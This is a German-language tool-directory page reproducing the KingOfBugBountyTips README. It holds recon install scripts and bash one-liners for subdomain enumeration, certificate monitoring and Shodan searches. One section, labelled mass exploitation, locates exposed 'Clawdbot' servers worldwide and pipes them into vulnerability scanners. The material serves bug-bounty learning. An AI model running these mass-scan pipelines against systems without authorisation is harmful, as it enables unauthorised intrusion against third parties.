Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
KingOfBugBountyTips — Unser Hauptziel ist es, Tipps von einigen bekannten Bughuntern zu teilen. Mithilfe der Recon-Methodik können wir Subdomains, APIs und Token finden, die bereits ausnutzbar sind, um sie zu melden. Wir möchten Onelinetips beeinflussen und die Befehle erklären, zum besseren Verständnis für neue Hunter.. | Kitploit
Tools/GitHubGitHub/kingofbugbounty/kingofbugbountytips
OSINT (Open-Source-Intelligence)AufklärungSchwachstellenscannerWebsicherheitPenetrationstestsSubdomain-EnumerationLernen & BildungKuratierte RessourcenTop in Aufklärung Nr.8

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Unser Hauptziel ist es, Tipps von einigen bekannten Bughuntern zu teilen. Mithilfe der Recon-Methodik können wir Subdomains, APIs und Token finden, die bereits ausnutzbar sind, um sie zu melden. Wir möchten Onelinetips beeinflussen und die Befehle erklären, zum besseren Verständnis für neue Hunter..

GitHubkingofbugbounty/kingofbugbountytips

KingOfBugBountyTips

Repository anzeigen
5.5k984vor 1 MonatVon Kitploit geprüft
Teilen

KingOfBugBountyTips

Taktische Aufklärung

Das ultimative Bug-Bounty-Aufklärungsarsenal

"Im Schatten jagen wir, dem Code vertrauen wir"


Sterne Gabeln Letzter Commit Lizenz


Telegram | Twitter | YouTube | LinkedIn


DoD VDP-Bereich

DoD Vulnerability Disclosure Program | KingRecon DOD

Vollständiger DoD-Bereich - 19 Domänen```bash # BBRF Scope - All DoD Domains bbrf inscope add '*.af.mil' '*.army.mil' '*.marines.mil' '*.navy.mil' '*.spaceforce.mil' '*.ussf.mil' '*.pentagon.mil' '*.osd.mil' '*.disa.mil' '*.dtra.mil' '*.dla.mil' '*.dcma.mil' '*.dtic.mil' '*.dau.mil' '*.health.mil' '*.ng.mil' '*.uscg.mil' '*.socom.mil' '*.dds.mil' '*.yellowribbon.mil' ``` | Militärische Zweige | Behörden des DoD | Unterstützungskommandos | |:--------------------|:-----------------|:-------------------------| | `*.af.mil` – Air Force | `*.pentagon.mil` – Pentagon-Hauptquartier | `*.dtic.mil` – Technisches Informationszentrum | | `*.army.mil` – Army | `*.osd.mil` – Büro des Verteidigungsministers | `*.dau.mil` – Beschaffungsuniversität | | `*.marines.mil` – Marines | `*.disa.mil` – Verteidigungsinformationssysteme | `*.health.mil` – Militärgesundheit | | `*.navy.mil` – Navy | `*.dtra.mil` – Bedrohungsreduktion | `*.ng.mil` – Nationalgarde | | `*.spaceforce.mil` – Space Force | `*.dla.mil` – Logistikbehörde | `*.uscg.mil` – Küstenwache | | `*.ussf.mil` – Space Force | `*.dcma.mil` – Vertragsmanagement | `*.socom.mil` – Spezialoperationen |

Sicherheitshinweis

Dieses Repository ist NUR für BILDUNGSZWECKE und AUTORISIERTE TESTS. Holen Sie stets die entsprechende Genehmigung ein, bevor Sie Tests durchführen.

📜 Klicken Sie hier, um unsere Sicherheitsrichtlinien zu lesen

✅ Zulässige Anwendungsfälle

  • ✅ Autorisierte Bug-Bounty-Programme – HackerOne, Bugcrowd, Intigriti usw.
  • ✅ Autorisierte Penetrationstests – Mit schriftlicher Genehmigung
  • ✅ Persönliche Laborumgebungen – Eigene Infrastruktur
  • ✅ Bildungszwecke – Lernen und Forschung
  • ✅ DoD-VDP-Programm – Unter Einhaltung der Programmregeln

❌ Verbotene Aktivitäten

  • ❌ Unbefugte Tests – Testen ohne ausdrückliche Erlaubnis
  • ❌ Böswillige Absicht – Verwendung von Techniken zur Schädigung oder zum Diebstahl
  • ❌ Tests außerhalb des Geltungsbereichs – Testen von Zielen, die nicht im Programmumfang liegen
  • ❌ Social Engineering – Sofern nicht ausdrücklich im Programm erlaubt
  • ❌ DoS/DDoS-Angriffe – Angriffe zur Ressourcenerschöpfung

📋 Richtlinien zur verantwortungsvollen Offenlegung

  1. Lesen Sie die Programmrichtlinien – Überprüfen Sie immer Umfang und Regeln
  2. Testen Sie sicher – Fügen Sie Produktionssystemen keinen Schaden zu
  3. Dokumentieren Sie alles – Führen Sie detaillierte Notizen zu Ihren Erkenntnissen
  4. Melden Sie vertraulich – Nutzen Sie offizielle Kanäle für die Offenlegung
  5. Geben Sie Zeit für Reparaturen – Gewähren Sie Anbietern angemessene Zeit für Patches
  6. Seien Sie professionell – Halten Sie ethische Standards ein

🔒 Sicherheitsprobleme melden


📚 Inhaltsverzeichnis

Klicken Sie zum Aufklappen der Navigation

🎯 Überblick

```ascii ╔═══════════════════════════════════════════════════════════════╗ ║ 🎯 MISSION STATEMENT 🎯 ║ ╠═══════════════════════════════════════════════════════════════╣ ║ Share elite bug bounty techniques from world-class hunters ║ ║ Build the most comprehensive one-liner collection ║ ║ Empower the security research community ║ ╚═══════════════════════════════════════════════════════════════╝ ```

Unser Hauptziel ist es, Tipps von bekannten Bug-Huntern zu teilen. Mit fortschrittlicher Recon-Methodik entdecken wir Subdomains, APIs, Tokens und ausnutzbare Schwachstellen. Wir möchten die Community mit leistungsstarken One-Liner-Techniken beeinflussen und schulen, um besseres Verständnis und schnellere Ergebnisse zu erzielen.

🏆 Was macht dieses Repository besonders?

📦 Spezielle Ressourcen

BugBuntu KingRecon Contribute

📊 Repository-Highlights

📈 Klicken Sie für detaillierte Statistiken

🚀 Schnellstart

⚡ Starten Sie Ihre erste Recon in unter 5 Minuten

1️⃣ Tools installieren

Time

2️⃣ Recon ausführen

```bash # 📥 Step 1: Install essential tools (ProjectDiscovery Suite) go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

🔍 Step 2: Run your first reconnaissance chain

subfinder -d target.com -silent | httpx -silent | nuclei -severity critical,high

🎉 Step 3: Analyze results and profit!

Check the output for vulnerabilities and start reporting!

root@kitploit:~
<details>
<summary><b>🎬 Möchten Sie einen vollständigen automatisierten Workflow? Klicken Sie hier!</b></summary>

<br>```bash
# 🚀 Advanced Quick Start - Complete Recon Pipeline
TARGET="target.com"

# Subdomain enumeration with multiple sources
subfinder -d $TARGET -all -silent | \
httpx -silent -title -status-code -tech-detect -follow-redirects | \
tee subdomains_live.txt

# Deep crawling and parameter discovery
cat subdomains_live.txt | katana -silent -d 3 -jc | \
grep -E '\\.js$' | \
httpx -silent -mc 200 | \
tee js_files.txt

# Vulnerability scanning with Nuclei
nuclei -l subdomains_live.txt -severity critical,high,medium -silent -o nuclei_results.txt

# 💎 Results saved in:
# - subdomains_live.txt (Live domains)
# - js_files.txt (JavaScript files)
# - nuclei_results.txt (Vulnerabilities found)

🎯 Profi-Tipps für Anfänger


🛠️ Erforderliche Tools

Klicken Sie, um die vollständige Tool-Liste zu erweitern

Kern-Tools


📊 Repository-Analysen


💖 Unterstütze das Projekt

Wenn dir dieses Repository auf deiner Bug-Bounty-Reise geholfen hat, erwäge, das Projekt zu unterstützen!

Buy Me A Coffee

⭐ Zeige deine Unterstützung

Gib diesem Repository einen Stern, wenn du es hilfreich fandest!

GitHub stars


📜 Lizenz & Rechtliches

License

⚠️ Wichtiger Haftungsausschluss

```ascii ╔═══════════════════════════════════════════════════════════════╗ ║ ⚠️ LEGAL NOTICE ⚠️ ║ ╠═══════════════════════════════════════════════════════════════╣ ║ This repository is for EDUCATIONAL PURPOSES ONLY ║ ║ ║ ║ ✅ DO: Use for authorized security testing ║ ║ ✅ DO: Learn and understand the techniques ║ ║ ✅ DO: Contribute and share knowledge ║ ║ ║ ║ ❌ DON'T: Use for unauthorized testing ║ ║ ❌ DON'T: Use for malicious purposes ║ ║ ❌ DON'T: Violate laws or regulations ║ ║ ║ ║ The authors are NOT responsible for any misuse or damage ║ ║ caused by this information. Always test responsibly! ║ ╚═══════════════════════════════════════════════════════════════╝ ```

🔗 Schnelllinks & Ressourcen


🌟 Besonderer Dank

An alle Mitwirkenden, Bug-Bounty-Jäger und die Sicherheits-Community, die dieses Projekt möglich machen!


Zuletzt aktualisiert: Juli 2026 | Version: 4.6



```ascii ╔══════════════════════════════════════════════════════════════════╗ ║ "Stay curious, stay ethical, stay hungry" 🏴‍☠️ ║ ║ Happy Hunting! 💀 ║ ╚══════════════════════════════════════════════════════════════════╝

root@kitploit:~
<br>

**Mit ❤️ gemacht von der Bug Bounty Community**

</div>
Tool herunterladen

Haben Sie ein Sicherheitsproblem in diesem Repository gefunden? Bitte melden Sie es verantwortungsvoll:

Problem melden

AbschnittBeschreibung
ÜberblickProjektübersicht und Ziele
SchnellstartIn 5 Minuten loslegen
Erforderliche ToolsWesentliches Toolkit
BBRF Scope DoDDoD-Bereichskonfiguration
Subdomain-EnumerationSubdomains finden
JavaScript-ReconJS-Dateianalyse
XSS-ErkennungCross-Site-Scripting
SQL-InjectionSQLi-Techniken
SSRF & SSTIServerseitige Angriffe
Web-CrawlingTiefes Crawlen
Parameter-ErkennungVersteckte Parameter
InhaltserkennungSensitive Dateien
Nuclei-ScanAutomatisierte Scans
API-SicherheitstestsAPI-Schwachstellen
Cloud-SicherheitAWS, GCP, Azure
AutomatisierungsskripteFertig einsetzbare Skripte
Bash-FunktionenShell-Produktivität
Neue Oneliners 2026CVE-2026-Exploits & Techniken
Oneliners 2024-2025Frühere Techniken
Februar 2026 CVE-ErkennungNeueste CVE-Recon-Oneliners
SuchmaschinenSuchmaschinen für Hacker
WortlistenBeste Wortlisten
RessourcenBücher, Kurse, Blogs
Oneliners
💎 Kuratierte Befehle
Kampferprobt von echten Huntern
Methodology
🎯 Vollständige Methodik
Von Recon bis Exploitation
Updated
🔄 Ständig aktualisiert
Neue Techniken wöchentlich
Community
🌍 Community-getrieben
Top-Hunter weltweit
KategorieAnzahlStatus
One-Liner400+✅ Aktiv
Techniken50+✅ Aktiv
Abgedeckte Tools100+✅ Aktiv
CVE-Beispiele20+✅ Aktiv
DoD-Domains19✅ Aktiv
MitwirkendeWachsend🚀 Wachsend
Letztes Update2026✅ Aktuell
Time

3️⃣ Bugs finden

Time
TippBeschreibung
🔑Holen Sie immer eine ordnungsgemäße Genehmigung vor dem Testen ein
📝Führen Sie detaillierte Notizen zu Ihren Ergebnissen
🛠️Beginnen Sie mit automatisierten Tools, dann manuelles Testen
💰Konzentrieren Sie sich zuerst auf Schwachstellen mit hoher Auswirkung
🤝Treten Sie der Community bei und lernen Sie von anderen
KategorieToolsInstallation
SubdomainSubfinder, Amass, Assetfinder, Findomain, Chaosgo install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
HTTP ProbingHttpx, Httprobego install github.com/projectdiscovery/httpx/cmd/httpx@latest
CrawlingKatana, Gospider, Hakrawler, Cariddigo install github.com/projectdiscovery/katana/cmd/katana@latest
URLsGau, Waybackurls, Waymorego install github.com/lc/gau/v2/cmd/gau@latest
ScannenNuclei, Jaeles, Naabugo install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
XSSDalfox, XSStrike, Kxss, Airixssgo install github.com/hahwul/dalfox/v2@latest
SQLiSQLMap, Ghauripip install sqlmap ghauri
HilfsprogrammeAnew, Qsreplace, Unfurl, Gf, Urogo install github.com/tomnomnom/anew@latest
FuzzingFfuf, Feroxbustergo install github.com/ffuf/ffuf/v2@latest
JS-AnalyseSubjs, LinkFinder, SecretFinder, Jsubfindergo install github.com/lc/subjs@latest
ZertifikatsüberwachungCertstream, Certstream-gopip install certstream
DNSDnsx, Shuffledns, PureDNS, MassDNS, Dnsgengo install github.com/projectdiscovery/dnsx/cmd/dnsx@latest
Reverse DNSHakrevdns, Pripsgo install github.com/hakluke/hakrevdns@latest
API-ErkennungArjun, x8, ParamSpiderpip install arjun
ScreenshotsGowitness, Eyewitnessgo install github.com/sensepost/gowitness@latest
CloudAWS CLI, CloudEnum, S3Scannerpip install awscli
OSINTShodan CLI, Censys, Metabigorpip install shodan censys
Git-AufklärungTrufflehog, Gitrob, Github-Subdomainsgo install github.com/trufflesecurity/trufflehog/v3@latest
BereichsverwaltungBBRFpip install bbrf

Systemabhängigkeiten```bash

Ubuntu/Debian

sudo apt update && sudo apt install -y
jq
curl
wget
git
python3
python3-pip
golang-go
nmap
masscan
chromium-browser
parallel
whois
dnsutils
libpcap-dev
build-essential

macOS

brew install jq curl wget git python3 go nmap masscan chromium parallel whois bind

root@kitploit:~
### Go-Umgebung einrichten```bash
# Add to ~/.bashrc or ~/.zshrc
export GOPATH=$HOME/go
export GOROOT=/usr/local/go
export PATH=$PATH:$GOPATH/bin:$GOROOT/bin

# Reload shell
source ~/.bashrc  # or source ~/.zshrc

Schnellinstallations-Skript - Go Tools```bash

#!/bin/bash

One-click install for all Go tools

echo "[*] Installing Go tools..." go_tools=( # ProjectDiscovery "github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest" "github.com/projectdiscovery/httpx/cmd/httpx@latest" "github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest" "github.com/projectdiscovery/katana/cmd/katana@latest" "github.com/projectdiscovery/naabu/v2/cmd/naabu@latest" "github.com/projectdiscovery/dnsx/cmd/dnsx@latest" "github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest" "github.com/projectdiscovery/chaos-client/cmd/chaos@latest" # Tomnomnom "github.com/tomnomnom/waybackurls@latest" "github.com/tomnomnom/anew@latest" "github.com/tomnomnom/qsreplace@latest" "github.com/tomnomnom/unfurl@latest" "github.com/tomnomnom/gf@latest" "github.com/tomnomnom/assetfinder@latest" "github.com/tomnomnom/httprobe@latest" # Fuzzing & Crawling "github.com/ffuf/ffuf/v2@latest" "github.com/jaeles-project/gospider@latest" "github.com/hakluke/hakrawler@latest" "github.com/hakluke/hakrevdns@latest" # Security "github.com/hahwul/dalfox/v2@latest" "github.com/lc/gau/v2/cmd/gau@latest" "github.com/lc/subjs@latest" # Screenshots & Utils "github.com/sensepost/gowitness@latest" "github.com/d3mondev/puredns/v2@latest" "github.com/j3ssie/metabigor@latest" "github.com/Emoe/kxss@latest" "github.com/ferreiraklet/airixss@latest" "github.com/edoardottt/cariddi/cmd/cariddi@latest" "github.com/trufflesecurity/trufflehog/v3@latest" )

for tool in "${go_tools[@]}"; do echo "[+] Installing $tool" go install -v "$tool" 2>/dev/null done

echo "[✓] Go tools installed!"

root@kitploit:~
### Schnellinstallationsskript - Python-Werkzeuge```bash
#!/bin/bash
# One-click install for all Python tools

echo "[*] Installing Python tools..."

pip3 install --upgrade pip

pip3 install \
    certstream \
    sqlmap \
    ghauri \
    uro \
    arjun \
    paramspider \
    shodan \
    censys \
    bbrf \
    dnsgen \
    waymore \
    xsstrike \
    s3scanner \
    cloud_enum \
    trufflehog

echo "[✓] Python tools installed!"

Schnellinstallationsskript - Rust-Tools (Feroxbuster)```bash

#!/bin/bash

Install Feroxbuster (Rust)

echo "[*] Installing Rust tools..."

Install Rust if not present

if ! command -v cargo &> /dev/null; then curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y source $HOME/.cargo/env fi

Install Feroxbuster

cargo install feroxbuster

echo "[✓] Rust tools installed!"

root@kitploit:~
### Schnellinstallations-Skript - Externe Werkzeuge```bash
#!/bin/bash
# Install tools that require cloning

echo "[*] Installing external tools..."

TOOLS_DIR="$HOME/tools"
mkdir -p $TOOLS_DIR && cd $TOOLS_DIR

# LinkFinder
git clone https://github.com/GerbenJavado/LinkFinder.git
cd LinkFinder && pip3 install -r requirements.txt && cd ..

# SecretFinder
git clone https://github.com/m4ll0k/SecretFinder.git
cd SecretFinder && pip3 install -r requirements.txt && cd ..

# Findomain
wget https://github.com/Findomain/Findomain/releases/latest/download/findomain-linux.zip
unzip findomain-linux.zip && chmod +x findomain && sudo mv findomain /usr/local/bin/

# MassDNS
git clone https://github.com/blechschmidt/massdns.git
cd massdns && make && sudo mv bin/massdns /usr/local/bin/ && cd ..

# Amass
go install -v github.com/owasp-amass/amass/v4/...@master

# GF Patterns
git clone https://github.com/1ndianl33t/Gf-Patterns.git
mkdir -p ~/.gf && cp Gf-Patterns/*.json ~/.gf/

echo "[✓] External tools installed!"

Master-Installationsskript (All-in-One)```bash

#!/bin/bash

MASTER INSTALLER - Run all installation scripts

echo "╔══════════════════════════════════════════════════════════╗" echo "║ KingOfBugBounty - Complete Tool Installation ║" echo "╚══════════════════════════════════════════════════════════╝"

System dependencies (run with sudo)

echo "[1/5] Installing system dependencies..." sudo apt update && sudo apt install -y jq curl wget git python3 python3-pip golang-go nmap masscan chromium-browser parallel whois dnsutils libpcap-dev build-essential

Go environment

echo "[2/5] Setting up Go environment..." echo 'export GOPATH=$HOME/go' >> ~/.bashrc echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc source ~/.bashrc

Go tools

echo "[3/5] Installing Go tools..." go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest go install -v github.com/projectdiscovery/katana/cmd/katana@latest go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest go install -v github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest go install -v github.com/tomnomnom/waybackurls@latest go install -v github.com/tomnomnom/anew@latest go install -v github.com/tomnomnom/qsreplace@latest go install -v github.com/tomnomnom/unfurl@latest go install -v github.com/tomnomnom/gf@latest go install -v github.com/tomnomnom/assetfinder@latest go install -v github.com/ffuf/ffuf/v2@latest go install -v github.com/hahwul/dalfox/v2@latest go install -v github.com/lc/gau/v2/cmd/gau@latest go install -v github.com/jaeles-project/gospider@latest go install -v github.com/hakluke/hakrawler@latest go install -v github.com/hakluke/hakrevdns@latest go install -v github.com/sensepost/gowitness@latest go install -v github.com/d3mondev/puredns/v2@latest go install -v github.com/owasp-amass/amass/v4/...@master

Python tools

echo "[4/5] Installing Python tools..." pip3 install certstream sqlmap ghauri uro arjun shodan censys bbrf dnsgen waymore

Rust tools

echo "[5/5] Installing Rust tools..." if ! command -v cargo &> /dev/null; then curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y source $HOME/.cargo/env fi cargo install feroxbuster

Update Nuclei templates

nuclei -update-templates

echo "" echo "╔══════════════════════════════════════════════════════════╗" echo "║ ✓ Installation Complete! ║" echo "╚══════════════════════════════════════════════════════════╝" echo "" echo "Run 'source ~/.bashrc' to reload your environment"

root@kitploit:~
### Wortlisten-Installation```bash
#!/bin/bash
# Install essential wordlists

WORDLIST_DIR="$HOME/wordlists"
mkdir -p $WORDLIST_DIR && cd $WORDLIST_DIR

# SecLists
git clone https://github.com/danielmiessler/SecLists.git

# Assetnote Wordlists
wget -r --no-parent -R "index.html*" https://wordlists-cdn.assetnote.io/data/ -nH

# OneListForAll
git clone https://github.com/six2dez/OneListForAll.git

# Resolvers
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers.txt -O resolvers.txt
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt -O resolvers-trusted.txt

echo "[✓] Wordlists installed in $WORDLIST_DIR"

Installation überprüfen```bash

#!/bin/bash

Verify all tools are installed

echo "Checking installed tools..."

tools=("subfinder" "httpx" "nuclei" "katana" "naabu" "dnsx" "ffuf" "feroxbuster" "dalfox" "gau" "waybackurls" "anew" "qsreplace" "gf" "gospider" "hakrawler" "amass" "gowitness" "certstream" "sqlmap" "arjun" "shodan")

for tool in "${tools[@]}"; do if command -v $tool &> /dev/null; then echo "[✓] $tool" else echo "[✗] $tool - NOT FOUND" fi done

root@kitploit:~
</details>

---

## 🎯 BBRF Bereich DoD```bash
# Add all DoD domains to BBRF scope
bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' '*.spaceforce.mil' '*.ussf.mil'

💀 Subdomain-Enumeration ☠️

``` ███████╗██╗ ██╗██████╗ ██████╗ ██████╗ ███╗ ███╗ █████╗ ██╗███╗ ██╗ ██╔════╝██║ ██║██╔══██╗██╔══██╗██╔═══██╗████╗ ████║██╔══██╗██║████╗ ██║ ███████╗██║ ██║██████╔╝██║ ██║██║ ██║██╔████╔██║███████║██║██╔██╗ ██║ ╚════██║██║ ██║██╔══██╗██║ ██║██║ ██║██║╚██╔╝██║██╔══██║██║██║╚██╗██║ ███████║╚██████╔╝██████╔╝██████╔╝╚██████╔╝██║ ╚═╝ ██║██║ ██║██║██║ ╚████║ ╚══════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝ ``` **☠️ ALLES AUFZÄHLEN ☠️**

💀 Multi-Source Discovery (All-in-One)```bash

☠️ Ultimate subdomain enumeration - All tools combined

subfinder -d target.com -all -silent | anew subs.txt amass enum -passive -d target.com | anew subs.txt assetfinder -subs-only target.com | anew subs.txt chaos -d target.com -silent | anew subs.txt findomain -t target.com -q | anew subs.txt cat subs.txt | httpx -silent -threads 200 | anew alive.txt

root@kitploit:~
### 💀 Zertifikatstransparenz-Logs```bash
# ☠️ crt.sh extraction
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | httpx -silent

💀 Certstream Echtzeit-Überwachung - Basic```bash

☠️ Monitor certificates in real-time for specific keyword

pip install certstream && python3 -c "import certstream; certstream.listen_for_events(lambda msg, ctx: print(msg['data']['leaf_cert']['subject']['CN']) if 'target' in str(msg.get('data',{}).get('leaf_cert',{}).get('subject',{}).get('CN','')) else None, url='wss://certstream.calidog.io/')"

root@kitploit:~
### 💀 Certstream mit Domain-Filter```bash
# ☠️ Real-time cert monitoring filtered by domain keywords
certstream --full | jq -r 'select(.data.leaf_cert.subject.CN != null) | .data.leaf_cert.subject.CN' | grep -iE "(target|company|brand)" | anew certstream_targets.txt

💀 Certstream zur Subdomain-Erkennung```bash

☠️ Extract all SANs (Subject Alternative Names) in real-time

certstream --full | jq -r '.data.leaf_cert.extensions.subjectAltName // empty' | tr ',' '\n' | sed 's/DNS://g' | grep -E "target.com$" | sort -u | anew certstream_subs.txt

root@kitploit:~
### 💀 Certstream + httpx Live-Pipeline```bash
# ☠️ Real-time cert discovery -> immediate alive check
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' 2>/dev/null | grep -iE "target" | sort -u | while read domain; do echo "$domain" | httpx -silent -timeout 3 | anew live_certs.txt; done

💀 Certstream Phishing-Erkennung```bash

☠️ Monitor for potential phishing domains (brand impersonation)

certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "(paypal|apple|google|microsoft|amazon|facebook|netflix|bank)" | grep -vE ".(paypal|apple|google|microsoft|amazon|facebook|netflix).com$" | anew phishing_certs.txt

root@kitploit:~
### 💀 Certstream mit Nuclei Auto-Scan```bash
# ☠️ Real-time cert discovery -> automatic vulnerability scan
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -E "\.target\.com$" | sort -u | while read domain; do echo "https://$domain" | nuclei -t /nuclei-templates/technologies/ -silent; done

💀 Certstream Massen-Sammler-Skript```bash

☠️ Collect all certificates for specific TLDs

timeout 3600 bash -c 'certstream --full | jq -r ".data.leaf_cert.all_domains[]? // empty" | grep -E ".(gov|mil|edu)$" | anew gov_mil_edu_certs.txt' &

root@kitploit:~
### 💀 Certstream Wildcard Certificate Hunter```bash
# ☠️ Find wildcard certificates (*.domain.com) in real-time
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep "^\*\." | sed 's/^\*\.//' | sort -u | anew wildcard_domains.txt

💀 Certstream + Shodan Anreicherung```bash

☠️ Real-time certs -> resolve IP -> Shodan lookup

certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "target" | while read domain; do IP=$(dig +short "$domain" | head -1); [ -n "$IP" ] && echo "$domain,$IP,$(shodan host $IP 2>/dev/null | head -3 | tr '\n' ' ')"; done | anew cert_shodan.txt

root@kitploit:~
### 💀 Certstream JSON Logger mit Zeitstempel```bash
# ☠️ Full certificate logging with timestamps for analysis
certstream --full | jq -c '{timestamp: now | strftime("%Y-%m-%d %H:%M:%S"), cn: .data.leaf_cert.subject.CN, domains: .data.leaf_cert.all_domains, issuer: .data.leaf_cert.issuer.O}' | grep -i "target" | tee -a certstream_log.json

💀 Certstream Bug Bounty Scope Monitor```bash

☠️ Monitor multiple bug bounty targets simultaneously

TARGETS="hackerone|bugcrowd|intigriti|yeswehack"; certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -iE "$TARGETS" | anew bb_new_assets.txt &

root@kitploit:~
### 💀 Shodan + Nuclei Pipeline```bash
# ☠️ Shodan recon -> Nuclei scan
shodan domain target.com | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high

💀 Clawdbot-Erkennung via Shodan (Massenexploitation)

⚡ 1. Finde Clawdbot-Instanzen - Basissuche```bash

💀 Locate Clawdbot servers exposed on the internet

shodan search "Clawdbot" --fields ip_str,port,hostnames,org | awk '{print $1":"$2}' | anew clawdbot_targets.txt

root@kitploit:~
#### ⚡ 2. Clawdbot HTTP-Header-Erkennung```bash
# 💀 Find servers with Clawdbot in HTTP headers
shodan search "http.headers:Clawdbot" --fields ip_str,port,http.title | tee clawdbot_http.txt | wc -l && echo "targets found"

⚡ 3. Clawdbot User-Agent-Erkennung```bash

💀 Detect Clawdbot via User-Agent strings

shodan search "http.user_agent:Clawdbot" --fields ip_str,port,org,hostnames | awk -F'\t' '{print "https://"$1":"$2" - "$3}' | anew clawdbot_ua.txt

root@kitploit:~
#### ⚡ 4. Clawdbot + Nuclei Exploitation Pipeline```bash
# 💀 Mass Clawdbot discovery -> httpx alive -> Nuclei scan
shodan search "Clawdbot" --fields ip_str,port --limit 1000 | awk '{print $1":"$2}' | httpx -silent | nuclei -t ~/nuclei-templates/ -severity critical,high -o clawdbot_vulns.txt

⚡ 5. Clawdbot Server-Fingerprinting```bash

💀 Extract detailed server info from Clawdbot hosts

shodan search "Clawdbot" --fields ip_str,port,os,product,version,org | sort -t$'\t' -k4 | anew clawdbot_fingerprint.txt

root@kitploit:~
#### ⚡ 6. Clawdbot ASN Verteilungsanalyse```bash
# 💀 Map Clawdbot instances by ASN for targeted reconnaissance
shodan search "Clawdbot" --fields ip_str,asn,org | awk '{print $2}' | sort | uniq -c | sort -rn | head -20 | tee clawdbot_asn_stats.txt

⚡ 7. Clawdbot Geografische Verteilung```bash

💀 Find Clawdbot by country for geo-targeted testing

for country in US BR DE FR GB RU CN JP KR IN; do echo "=== $country ===" && shodan search "Clawdbot country:$country" --fields ip_str,port,city --limit 100 | anew clawdbot_${country}.txt; done

root@kitploit:~
#### ⚡ 8. Clawdbot + Port Range Scan```bash
# 💀 Discover Clawdbot on common web ports
shodan search "Clawdbot port:80,443,8080,8443,8000,3000,5000" --fields ip_str,port,http.server | awk '{print $1":"$2}' | httpx -silent -status-code -title | anew clawdbot_webports.txt

⚡ 9. Clawdbot SSL-Zertifikatanalyse```bash

💀 Extract Clawdbot hosts with SSL certificate info

shodan search "Clawdbot ssl:true" --fields ip_str,port,ssl.cert.subject.CN,ssl.cert.issuer.O | sort -u | anew clawdbot_ssl.txt

root@kitploit:~
#### ⚡ 10. Clawdbot Echtzeit-Überwachung + Alarm```bash
# 💀 Continuous monitoring for new Clawdbot instances
while true; do shodan search "Clawdbot" --fields ip_str,port,timestamp --limit 50 | sort -t$'\t' -k3 -r | head -10 | anew clawdbot_new.txt && sleep 3600; done &

💀 ASN Discovery & Reverse DNS```bash

☠️ Find all IPs from organization ASN

echo 'target_org' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]+.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'

root@kitploit:~
### 💀 DNS Bruteforce mit Shuffledns```bash
shuffledns -d target.com -w wordlist.txt -r resolvers.txt -silent | httpx -silent | anew

💀 Rekursive Subdomain-Enumeration```bash

subfinder -d target.com -recursive -all -silent | dnsx -silent | httpx -silent | anew recursive_subs.txt

root@kitploit:~
### 💀 Passives DNS - Mehrere Quellen```bash
# ☠️ HackerTarget
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1 | anew subs.txt

# ☠️ RapidDNS
curl -s "https://rapiddns.io/subdomain/target.com?full=1" | grep -oP '(?<=target="_blank">)[^<]+' | grep "target.com" | anew subs.txt

# ☠️ Riddler.io
curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -oP '\b([a-zA-Z0-9](https://github.com/kingofbugbounty/kingofbugbountytips/blob/HEAD/%5Ba-zA-Z0-9-%5D*%5Ba-zA-Z0-9%5D)?\.)+target\.com\b' | anew subs.txt

# ☠️ AlienVault OTX
curl -s "https://otx.alienvault.com/api/v1/indicators/domain/target.com/passive_dns" | jq -r '.passive_dns[].hostname' 2>/dev/null | sort -u | anew subs.txt

# ☠️ URLScan.io
